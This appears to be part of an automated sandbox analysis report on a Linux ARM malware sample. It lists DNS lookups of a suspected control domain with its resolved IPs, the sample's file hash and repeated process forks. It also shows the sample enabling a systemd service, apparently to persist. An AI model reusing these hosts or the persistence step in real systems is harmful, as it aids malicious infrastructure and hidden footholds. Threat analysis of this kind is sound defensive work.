                                                Jan 1, 2025 19:27:51.738477945 CET5029253192.168.2.231.1.1.1
                                                Jan 1, 2025 19:27:51.745606899 CET53502921.1.1.1192.168.2.23
                                                Jan 1, 2025 19:27:51.746252060 CET3405353192.168.2.231.1.1.1
                                                Jan 1, 2025 19:27:56.812629938 CET4532753192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:01.815814018 CET5433353192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:06.820499897 CET5134953192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:11.822309971 CET5011953192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:18.668658972 CET5482953192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:18.687968969 CET53548291.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:18.688679934 CET4838753192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:18.697601080 CET53483871.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:18.698226929 CET4448653192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:18.706116915 CET53444861.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:18.706751108 CET3733553192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:18.715286016 CET53373351.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:18.715876102 CET3779353192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:18.730798006 CET53377931.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:18.731453896 CET6022053192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:23.732646942 CET5574753192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:28.736351967 CET4125253192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:33.810048103 CET5048253192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:38.815073967 CET4164953192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:45.669382095 CET4385753192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:45.676529884 CET53438571.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:45.677393913 CET5823953192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:45.684326887 CET53582391.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:45.685190916 CET5993453192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:45.692148924 CET53599341.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:45.693059921 CET5678653192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:45.708030939 CET53567861.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:45.709117889 CET4074353192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:45.724016905 CET53407431.1.1.1192.168.2.23
                                                Jan 1, 2025 19:28:45.724883080 CET3280053192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:50.730046988 CET3648453192.168.2.231.1.1.1
                                                Jan 1, 2025 19:28:55.735578060 CET3993853192.168.2.231.1.1.1

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 1, 2025 19:26:55.136593103 CET192.168.2.231.1.1.10xc5f4Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.228065968 CET192.168.2.231.1.1.10xf4fbStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.245820999 CET192.168.2.231.1.1.10xf4fbStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.259864092 CET192.168.2.231.1.1.10xf4fbStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.271462917 CET192.168.2.231.1.1.10xf4fbStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.291819096 CET192.168.2.231.1.1.10xf4fbStandard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.136640072 CET192.168.2.231.1.1.10x4e06Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.159044981 CET192.168.2.231.1.1.10x4e06Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.179969072 CET192.168.2.231.1.1.10x4e06Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.192612886 CET192.168.2.231.1.1.10x4e06Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.207263947 CET192.168.2.231.1.1.10x4e06Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.221803904 CET192.168.2.231.1.1.10x6e8aStandard query (0)tcpdown.suo. [malformed]256498false
                                                Jan 1, 2025 19:27:02.225425005 CET192.168.2.231.1.1.10x6e8aStandard query (0)tcpdown.suo. [malformed]256502false
                                                Jan 1, 2025 19:27:07.227760077 CET192.168.2.231.1.1.10x6e8aStandard query (0)tcpdown.suo. [malformed]256509false
                                                Jan 1, 2025 19:27:12.236684084 CET192.168.2.231.1.1.10x6e8aStandard query (0)tcpdown.suo. [malformed]256257false
                                                Jan 1, 2025 19:27:17.239196062 CET192.168.2.231.1.1.10x6e8aStandard query (0)tcpdown.suo. [malformed]256262false
                                                Jan 1, 2025 19:27:24.072220087 CET192.168.2.231.1.1.10x6280Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.722098112 CET192.168.2.231.1.1.10x6280Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.731723070 CET192.168.2.231.1.1.10x6280Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.751868010 CET192.168.2.231.1.1.10x6280Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.759797096 CET192.168.2.231.1.1.10x6280Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.783409119 CET192.168.2.231.1.1.10x9a13Standard query (0)tcpdown.suo. [malformed]256269false
                                                Jan 1, 2025 19:27:29.788053036 CET192.168.2.231.1.1.10x9a13Standard query (0)tcpdown.suo. [malformed]256273false
                                                Jan 1, 2025 19:27:34.791549921 CET192.168.2.231.1.1.10x9a13Standard query (0)tcpdown.suo. [malformed]256283false
                                                Jan 1, 2025 19:27:39.794759035 CET192.168.2.231.1.1.10x9a13Standard query (0)tcpdown.suo. [malformed]256284false
                                                Jan 1, 2025 19:27:44.798049927 CET192.168.2.231.1.1.10x9a13Standard query (0)tcpdown.suo. [malformed]256292false
                                                Jan 1, 2025 19:27:51.640131950 CET192.168.2.231.1.1.10x3d60Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.694309950 CET192.168.2.231.1.1.10x3d60Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.702920914 CET192.168.2.231.1.1.10x3d60Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.718903065 CET192.168.2.231.1.1.10x3d60Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.738477945 CET192.168.2.231.1.1.10x3d60Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.746252060 CET192.168.2.231.1.1.10x9231Standard query (0)tcpdown.suo. [malformed]256298false
                                                Jan 1, 2025 19:27:56.812629938 CET192.168.2.231.1.1.10x9231Standard query (0)tcpdown.suo. [malformed]256304false
                                                Jan 1, 2025 19:28:01.815814018 CET192.168.2.231.1.1.10x9231Standard query (0)tcpdown.suo. [malformed]256309false
                                                Jan 1, 2025 19:28:06.820499897 CET192.168.2.231.1.1.10x9231Standard query (0)tcpdown.suo. [malformed]256315false
                                                Jan 1, 2025 19:28:11.822309971 CET192.168.2.231.1.1.10x9231Standard query (0)tcpdown.suo. [malformed]256319false
                                                Jan 1, 2025 19:28:18.668658972 CET192.168.2.231.1.1.10x430fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.688679934 CET192.168.2.231.1.1.10x430fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.698226929 CET192.168.2.231.1.1.10x430fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.706751108 CET192.168.2.231.1.1.10x430fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.715876102 CET192.168.2.231.1.1.10x430fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.731453896 CET192.168.2.231.1.1.10x8649Standard query (0)tcpdown.suo. [malformed]256327false
                                                Jan 1, 2025 19:28:23.732646942 CET192.168.2.231.1.1.10x8649Standard query (0)tcpdown.suo. [malformed]256329false
                                                Jan 1, 2025 19:28:28.736351967 CET192.168.2.231.1.1.10x8649Standard query (0)tcpdown.suo. [malformed]256337false
                                                Jan 1, 2025 19:28:33.810048103 CET192.168.2.231.1.1.10x8649Standard query (0)tcpdown.suo. [malformed]256337false
                                                Jan 1, 2025 19:28:38.815073967 CET192.168.2.231.1.1.10x8649Standard query (0)tcpdown.suo. [malformed]256344false
                                                Jan 1, 2025 19:28:45.669382095 CET192.168.2.231.1.1.10xe9a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.677393913 CET192.168.2.231.1.1.10xe9a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.685190916 CET192.168.2.231.1.1.10xe9a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.693059921 CET192.168.2.231.1.1.10xe9a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.709117889 CET192.168.2.231.1.1.10xe9a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.724883080 CET192.168.2.231.1.1.10x6677Standard query (0)tcpdown.suo. [malformed]256352false
                                                Jan 1, 2025 19:28:50.730046988 CET192.168.2.231.1.1.10x6677Standard query (0)tcpdown.suo. [malformed]256359false
                                                Jan 1, 2025 19:28:55.735578060 CET192.168.2.231.1.1.10x6677Standard query (0)tcpdown.suo. [malformed]256359false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.222951889 CET1.1.1.1192.168.2.230xc5f4No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.241785049 CET1.1.1.1192.168.2.230xf4fbName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.254184961 CET1.1.1.1192.168.2.230xf4fbName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.267119884 CET1.1.1.1192.168.2.230xf4fbName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.286715984 CET1.1.1.1192.168.2.230xf4fbName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:55.304621935 CET1.1.1.1192.168.2.230xf4fbName error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.151160955 CET1.1.1.1192.168.2.230x4e06Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.174571037 CET1.1.1.1192.168.2.230x4e06Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.187072039 CET1.1.1.1192.168.2.230x4e06Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.202061892 CET1.1.1.1192.168.2.230x4e06Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:26:57.215287924 CET1.1.1.1192.168.2.230x4e06Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.721425056 CET1.1.1.1192.168.2.230x6280Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.731087923 CET1.1.1.1192.168.2.230x6280Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.751029015 CET1.1.1.1192.168.2.230x6280Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.759063959 CET1.1.1.1192.168.2.230x6280Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:24.782736063 CET1.1.1.1192.168.2.230x6280Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.693655968 CET1.1.1.1192.168.2.230x3d60Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.702276945 CET1.1.1.1192.168.2.230x3d60Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.718179941 CET1.1.1.1192.168.2.230x3d60Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.737875938 CET1.1.1.1192.168.2.230x3d60Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:27:51.745606899 CET1.1.1.1192.168.2.230x3d60Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.687968969 CET1.1.1.1192.168.2.230x430fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.697601080 CET1.1.1.1192.168.2.230x430fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.706116915 CET1.1.1.1192.168.2.230x430fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.715286016 CET1.1.1.1192.168.2.230x430fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:18.730798006 CET1.1.1.1192.168.2.230x430fName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.676529884 CET1.1.1.1192.168.2.230xe9a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.684326887 CET1.1.1.1192.168.2.230xe9a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.692148924 CET1.1.1.1192.168.2.230xe9a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.708030939 CET1.1.1.1192.168.2.230xe9a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                Jan 1, 2025 19:28:45.724016905 CET1.1.1.1192.168.2.230xe9a1Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false

                                                System Behavior

                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:/tmp/arm.elf
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:01
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:01
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:02
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:03
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:05
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:05
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:05
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:10
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:10
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:15
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:15
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:17
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:20
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:25
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:32
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:32
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:40
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:40
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:47
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:47
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:55
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:27:55
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:00
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:00
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:05
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:05
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:15
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:15
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:25
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:25
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:32
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:33
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:33
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:40
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:40
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:47
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:48
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:55
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:28:55
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/bin/sh
                                                Arguments:sh -c "systemctl daemon-reload"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:52
                                                Start date (UTC):01/01/2025
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl daemon-reload
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:53
                                                Start date (UTC):01/01/2025
                                                Path:/tmp/arm.elf
                                                Arguments:-
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:53
                                                Start date (UTC):01/01/2025
                                                Path:/bin/sh
                                                Arguments:sh -c "systemctl enable startup_command.service"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:53
                                                Start date (UTC):01/01/2025
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:53
                                                Start date (UTC):01/01/2025
                                                Path:/usr/bin/systemctl
                                                Arguments:systemctl enable startup_command.service
                                                File size:996584 bytes
                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:53
                                                Start date (UTC):01/01/2025
                                                Path:/usr/lib/systemd/systemd
                                                Arguments:-
                                                File size:1620224 bytes
                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                Chronological Activities


                                                General

                                                Start time (UTC):18:26:53
                                                Start date (UTC):01/01/2025
